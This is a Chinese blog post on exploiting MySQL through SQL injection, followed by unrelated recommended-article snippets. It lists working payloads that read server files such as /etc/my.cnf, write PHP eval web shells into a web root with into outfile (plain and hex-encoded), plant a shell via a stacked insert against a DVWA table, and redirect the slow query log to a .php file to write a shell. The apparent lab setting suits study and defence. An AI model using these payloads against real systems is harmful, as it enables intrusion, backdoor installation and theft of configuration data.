mysql利用姿势排查

最新推荐文章于 2023-04-26 16:24:29 发布
最新推荐文章于 2023-04-26 16:24:29 发布
阅读量552 收藏
点赞数
分类专栏: 安全 文章标签: windows linux mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/123292330
版权

文章目录

读文件

首先,如果系统开启了 selinux(用户读取一个文件,必须该进程先通过SELinux验证,然后才是对用户的权限进行验证),是无法读取到其他服务配置文件或者 /etc/passwd 的,需要将 selinux 关闭才能读取。

load_file

查询命令

select load_file("/etc/my.cnf");

条件:受secure_file_priv字段的限制
当 mysql secure_file_priv 配置项为空(空是""而不是NULL,NULL代表不可读取),或者指定的一个目录时,即可读取文件。

show variables like "%secure%"

在这里插入图片描述

load data infile & load data local infile

条件:
load data infile 受secure_file_priv字段的限制
load data local infile 受客户端限制,如php.ini中mysqli.allow_local_infile = on

load data infile '/etc/my.cnf' into table test;
load data local infile '/etc/my.cnf' into table test;

这两句虽然都是读取文件并存到表中的,但是是有一定的区别的,按照我的理解是,第一句 SQL 是讲 mysql 服务所在的机器上的文件存到数据库中,而第二句是讲连接 mysql 的机器上的文件存入到 mysql 中

写文件

outfile & dumpfile

条件:
当 secure_file_priv 配置项为空或者指定了一个目录时,且该目录mysql有写入权限。

特点:
1、outfile可导出多行,dumpfile只能倒出一行
2、outfile和dumpfile的路径不能是0x开头或者char转换以后的路径
3、outfile将数据写到文件里时有特殊的格式转换
4、dumpfile 在写⽂件时会保持⽂件的原⽣内容/原数据格式,适合写二进制文件,如exe文件,udf提权的dll文件
4、outfile 和 dumpfile 在 mysql 3.23.55版本之后,不可以覆盖文件,只能创建新文件

select "123" into outfile "/tmp/123.txt";
select "123" into dumpfile "/tmp/123.txt";

举例:
一句话直接写

-1' union select 1,"<?php @eval($_POST['c']);?>" into outfile "C:/phpStudy/WWW/shell.php"

一句话shell HEX编码

id=-1' union select 1,0x3C3F70687020406576616C28245F504F53545B2763275D293B3F3E into outfile "C:/phpStudy/WWW/shell.php"#

先插入后写入

id=-1';insert into dvwa.guestbook values (2,"<?php @eval($_POST['c']);?>","shell") ;
id=-1' union select comment,name from dvwa.guestbook into outfile 'C:/phpStudy/WWW/shell.php';

日志

可以通过慢查询日志写入shell,慢查询日志是用来记录执行时间超过指定时间的查询语句
查看日志情况

SHOW GLOBAL VARIABLES LIKE '%log%';

在这里插入图片描述

  • slow_query_log :表示慢查询日志是否开启,ON表示开启,OFF表示未开启,默认OFF
  • slow_query_log_file :表示慢查询日志文件的路径

上面两个值我们都可以通过sql语句进行更改。

查看多久会触发慢查询

SHOW GLOBAL VARIABLES LIKE 'long%'

在这里插入图片描述
例子
1.开启慢查询日志并修改日志为网站路径下的脚本

-1';set global slow_query_log = 1;set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';#

2.执行包含Shell的查询语句并使用sleep(11)让语句记录进慢查询日志脚本

-1';select "<?php eval($_POST[log]);?>" from users where sleep(11);#

参考:
https://www.freebuf.com/articles/web/244103.html
https://www.freebuf.com/articles/web/243136.html

5wimming
关注
专栏目录
零基础入门 全角度解读企业主流数据库MySQL8.0 --- 复习笔记
争当做一个有趣的人
03-09 1314
〖课程介绍〗: 本课程遵循“用户体验至上”的原则,不敢说设计精良,尽善尽美,却也竭尽全力去锻造良好的学习体验。包含三方面,(1)设计之初:遵循“有教无类,教学相长”的原则;(2)学习路线:采用循序渐进的教学模式,带你从了解到熟悉,到掌握,到精通,最后到深谙;(3)学习内容:课程遵循前沿性,以当前最新企业主流的MySQL8.0版本为内容。以“实用”为课程最高宗旨,带你搞定工作中SQL优化 痛点问题,最终的目的是:助力个人能力的快速提升,最终服务工作所需,助你占据不可替代的一席之地 第1章 【蓦然回首】开篇..
谁再说学不会 MySQL 数据库,就把这个给他扔过去
a1472750149的博客
01-11 1200
又是新的一年奋斗路的开启,相信有不少人农历新年之后,肯定会有所变动(跳槽加薪少不了)。所以,我把往期推送过的MySQL技术文章做了一个相关的整理,基础不好的可以从最基础的学习一遍,提高的也可以从中再提取深入一下。 码字不易,如有帮助,请随手点在看与转发朋友圈支持一下民工哥,关注我,一起学习更多的IT技术知识,共同进步。 数据库是什么 数据库管理系统,简称为DBMS(Database Management System),是用来存储数据的管理系统。 DBMS 的重要性 无法多人共享数...
MySQL JDBC Connector的allowUrlInLocalInfile选项利用
fnmsd的博客
06-01 1万+
MySQL JDBC Connector的allowUrlInLocalInfile选项,开启时可以进行SSRF及列目录。客户端文件读取利用的扩展。
php配置中mysql配置_PHP: 运行时配置 - Manual
weixin_29881131的博客
03-09 536
mysqli.allow_local_infileinteger允许Mysql的Load Data语句访问PHP角度看的本地文件。mysqli.local_infile_directorystring限制加载 LOCAL DATA 文件为指定的目录。mysqli.allow_persistentinteger开启使用mysqli.max_persistentinteger可以创建的持久化连接的最大...
使用mysql导入本地文件文件时提示"ERROR 1148 (42000): The used command is not allowed with this MySQL version"
ljwwjl的博客
03-10 6291
原因是为了安全起见,MYSQL默认不允许客户端从本地载入文件。 解决办法如下 服务器端: 需要将local_infile这个全局变量设置为ON,登陆到MYSQL中后执行命令 show global variables like 'local_infile' 显示当前local_infile值为OFF,没有从本地载入文件权限 执行命令将其值改为ON se...
MySQL修改my.ini文件失效
TLY820的博客
06-17 983
本机电脑先后安装了5.5,5.7,8.0三个版本 在cmd中为了解决乱码问题,修改了当前使用的5.7版本的my.ini 设置default-character-set=gbk 结果没有作用 问题在于环境变量中 5.5在5.7之前 解决办法:将5.7的路径上移,结果成功 ...
MySQL load data local infile踩坑
yz_yz1234的博客
04-08 4818
问题描述 在我写从hdfs转储数据到mysql的过程中,使用jdbc调用LOAD DATA local infile命令批量插入时一直会出现 The used command is not allowed with this MySQL version 我使用的是mysql8,因为这方面经验不足,走了不少弯路,小记一下,留存。 在mysql8中,local infile是默认关闭的,我查了...
MySQL基础篇】数据导出导入权限与local_infile参数
Sebastien23的博客
02-17 9678
MySQL基础篇】数据导出导入权限与local_infile参数问题背景数据导出测试创建测试库(在主库进行)测试数据导出(在从库进行)测试数据导入(在主库进行) 问题背景 MySQL高可用集群架构中,应用需要使用select ... into outfile和load data [local] infile来进行数据导入导出操作。其中,数据导出(只涉及读操作)发生在只读Slave节点,通过localhost连入数据库;数据导入(涉及读写操作)发生在Master节点,通过集群vip连入数据库。 DB
mysql改密码未生效,涨姿势了!
m0_57081438的博客
06-22 227
数据库 2.1 池化技术:如何减少频繁创建数据库连接的性能损耗? 2.2 数据库优化方案(一):查询请求增加时,如何做主从分离? 2.3 数据库优化方案(二):写入数据量增加时,如何实现分库分表? 2.4 发号器:如何保证分库分表后ID的全局唯一性? 2.5 NoSQL:在高并发场景下,数据库和NoSQL如何做到互补? 缓存 3.1 缓存:数据库成为瓶颈后,动态数据的查询要如何加速? 3.2 缓存的使用姿势(一):如何选择缓存的读写策略? 3.3 缓存的使用姿势(二):缓存如何做到高可用? 3.4
玩转MySQL之深入剖析整体架构
Java_LingFeng的博客
11-04 277
无论你是前端还是后端,只要是一个合格的开发者,对于MySQL这个名词相信都不陌生,MySQL逐渐成为了最受欢迎的关系型数据库,无论你是大前端,亦或是Java、Go、Python、C/C++、PHP....等这些语言的程序员,对于MySQL是必然要掌握的核心技术之一,程序员不能没有MySQL,就像西方不能失去耶路撒冷一般。
PHP MySQL的安装与配置详解
09-10
本篇文章给大家介绍php mysql的安装与配置,首先给大家介绍安装配置php,接着介绍配置mysql、安装mysql,本文介绍的非常详细,需要的朋友可以参考下
DBA如何利用strace/pstack/gdb来定位问题
魏书生的博客
02-18 424
参考:https://database.51cto.com/art/202006/617923.htm strace简介 strace是Linux环境下的一款程序调试工具,用来监察一个应用程序所使用的系统调用。 Strace是一个简单的跟踪系统调用执行的工具。在其最简单的形式中,它可以从开始到结束跟踪二进制的执行,并在进程的生命周期中输出一行具有系统调用名称,每个系统调用的参数和返回值的文本行。 常用选项 -T:strace输出显示时间 -t:可以在每行的输出之前添加时间戳,-tt可以精确到..
MySQL变量:local_infile
热门推荐
记事本
04-10 2万+
local_infile服务器变量指示能否使用load data local infile命令。该变量默认为ON。 该变量为OFF时,禁用客户端的load data local infile命令。 Sql代码 mysql>showcreatetabletest.t\G ***************************1.row**********...
MySql 优化(3)
ziyi813的博客
03-12 2118
MySql优化 一些常用的MySql使用中的常见优化细节。 大批量数据加载优化 load数据加载 格式: load data local infile '文件路径' into table 表名 fields terminated by '[分隔符]' line terminated by '[换行符]' 1、 首先,检测全局变量‘local_infile’的状态,如果是off状态则是不可用 show global variables like 'local_infile'; 2、 修改local_inf
mysql修改local_infile,切换到mysqli后LOCAL INFILE的问题
weixin_34901693的博客
01-20 1440
Anyone that is aware of the issues with using LOCAL INFILE in PHP will understand my frustration with this.I previously got LOCAL INFILE working properly in all my PHP scripts by using the 128 flag in...
Mysql allowLoadLocalInfil 参数漏洞分析
编码行者的博客
01-06 2192
收到这个漏洞首先,第一时间去官网,官网说这个参数3.03版本就修复了。默认false值。想当然的认为没问题,分析版本一大波操作下来,最后看源码默认值true,坑爹的官网有错误,坑死老夫了,果断跟官网反映 allowLoadLocalInfile Should the driver allow use of “LOAD DATA LOCAL INFILE …”? Setting to “true” overrides whatever path is set in ‘allowLoadLocalInfile
mysql数据库故障排查
最新发布
yangnk的技术记录
04-26 806
Mysql中CPU飙升的排查思路和JVM中CPU飙升的排查思路差不多。首先还是通过top命令看到哪个进程的占用率最高,再通过命令看该进程下哪个线程的占用率最高,最高在Mysql中能查到OS的线程Id和Mysql的线程Id的对应关系,找到这个关系后,就能找到哪句SQL执行占用的CPU比较高。
MySQL远程导入数据LOAD DATA LOCAL INFILE ...
很多时候,你缺少的不是知识而是热情
11-13 1万+
假设客户端与MYSQL服务器不在同一机器 导入文件在客户端机器上/usr/jfy/tmp/scpcdr.txt,在客户机登录mysql后,执行下面导入语句: LOAD DATA LOCAL INFILE  "/usr/jfy/tmp/scpcdr.txt" into table scpcdr fields TERMINATED by '|'; 正常情况是可以成功的,如果出现提示:
MySQL疑难杂症排查技巧
"叶金荣在2016年PostgresConferenceChina中分享了关于MySQL疑难杂症排查的分析文档,旨在帮助初级工程师解决网站性能问题。内容涉及到问题确认、问题追踪以及常见的性能瓶颈检查方法。" 在面对网站打开速度慢或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值